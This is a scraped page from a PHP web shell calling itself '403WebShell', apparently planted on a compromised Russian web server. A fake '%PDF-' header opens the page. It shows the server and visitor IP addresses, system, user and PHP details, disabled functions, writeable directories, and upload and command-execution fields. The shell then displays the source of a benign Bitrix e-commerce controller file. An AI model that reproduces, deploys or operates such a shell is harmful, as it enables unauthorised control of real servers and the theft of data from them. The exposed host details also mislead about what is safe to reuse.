%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 18.225.209.250
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/sale/lib/controller/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/sale/lib/controller/controllerbase.php
<?php


namespace Bitrix\Sale\Controller;

use \Bitrix\Main\Engine;
use Bitrix\Main\Engine\Action;
use Bitrix\Main\Engine\ActionFilter\ClosureWrapper;
use Bitrix\Main\NotImplementedException;
use Bitrix\Main\Result;
use Bitrix\Main\SystemException;
use Bitrix\Main\UI\PageNavigation;
use Bitrix\Rest\Integration\ViewManager;
use Bitrix\Rest\Integration\Externalizer;

class ControllerBase extends Engine\Controller
{
	protected $viewManager;

	protected function create($actionName)
	{
		$action = parent::create($actionName);

		if($this->getScope() == Engine\Controller::SCOPE_REST)
		{
			$this->viewManager = new \Bitrix\Rest\Integration\SaleViewManager($action);
		}

		return $action;
	}

	public function configureActions()
	{
		return [
			'getFields' => [
				'+prefilters' => [
					function()
					{
						/** @var ClosureWrapper $this */
						/** @var Action $action */
						$action = $this->getAction();
						if($action->getController()->getScope() !== \Bitrix\Main\Engine\Controller::SCOPE_REST)
						{
							throw new SystemException('the method is only available in the rest service');
						}
					}
				],
			],
		];
	}

	/**
	 * @return ViewManager
	 */
	public function getViewManager()
	{
		return $this->viewManager;
	}

	/**
	 * @param Action $action
	 * @return bool|null
	 * @throws NotImplementedException
	 * @throws SystemException
	 */
	protected function processBeforeAction(Engine\Action $action)
	{
		$r = $this->checkPermission($action->getName(), $action->getArguments());
		if($r->isSuccess())
		{
			if($this->getScope() == Engine\Controller::SCOPE_REST)
			{
				$internalizer = new \Bitrix\Rest\Integration\Internalizer($this->getViewManager());

				$r = $internalizer->process();

				if($r->isSuccess())
				{
					$action->setArguments($r->getData()['data']);
					return parent::processBeforeAction($action);
				}
				else
				{
					$this->addErrors($r->getErrors());
					return null;
				}
			}
			else
			{
				return parent::processBeforeAction($action);
			}
		}
		else
		{
			$this->addErrors($r->getErrors());
			return null;
		}
	}

	protected function processAfterAction(Engine\Action $action, $result)
	{
		if($this->getScope() == Engine\Controller::SCOPE_REST)
		{
			if($this->errorCollection->count()==0)
			{
				if($result instanceof Engine\Response\DataType\Page || is_array($result))
				{
					$data = $result instanceof Engine\Response\DataType\Page ?
						$result->toArray():$result;

					$externalizer = new Externalizer(
						$this->getViewManager(),
						$data
					);

					return $result instanceof Engine\Response\DataType\Page ?
						$externalizer->getPage($result):$externalizer;
				}
			}
		}

		return parent::processAfterAction($action, $result);
	}

	/**
	 * @param $name
	 * @param array $arguments
	 * @throws NotImplementedException
	 * @return Result
	 */
	private function checkPermission($name, $arguments=[])
	{
		if ($name == 'list')
		{
			$r = $this->checkReadPermissionEntity();
		}
		elseif ($name == 'getfields')
		{
			$r = $this->checkGetFieldsPermissionEntity();
		}
		elseif ($name == 'get')
		{
			$r = $this->checkReadPermissionEntity();
		}
		else
		{
			$r = $this->checkPermissionEntity($name, $arguments);
		}

		return $r;
	}

	/**
	 * @throws NotImplementedException
	 * @return Result
	 */
	protected function checkGetFieldsPermissionEntity()
	{
		return $this->checkReadPermissionEntity();
	}

	/**
	 * @throws NotImplementedException
	 * @return Result
	 */
	protected function checkReadPermissionEntity()
	{
		throw new NotImplementedException('Check read permission. The method checkReadPermissionEntity is not implemented.');
	}

	/**
	 * @param $name
	 * @param array $arguments
	 * @throws NotImplementedException
	 * @return Result
	 */
	protected function checkPermissionEntity($name, $arguments=[])
	{
		throw new NotImplementedException('Check permission entity. The method '.$name.' is not implemented.');
	}

	protected static function getNavData($start, $orm = false)
	{
		if($start >= 0)
		{
			return ($orm ?
				['limit' => \IRestService::LIST_LIMIT, 'offset' => intval($start)]
				:['nPageSize' => \IRestService::LIST_LIMIT, 'iNumPage' => intval($start / \IRestService::LIST_LIMIT) + 1]
			);
		}
		else
		{
			return ($orm ?
				['limit' => \IRestService::LIST_LIMIT]
				:['nTopCount' => \IRestService::LIST_LIMIT]
			);
		}
	}

	protected static function getApplication()
	{
		/** @global \CMain $APPLICATION */
		global $APPLICATION;

		return $APPLICATION;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit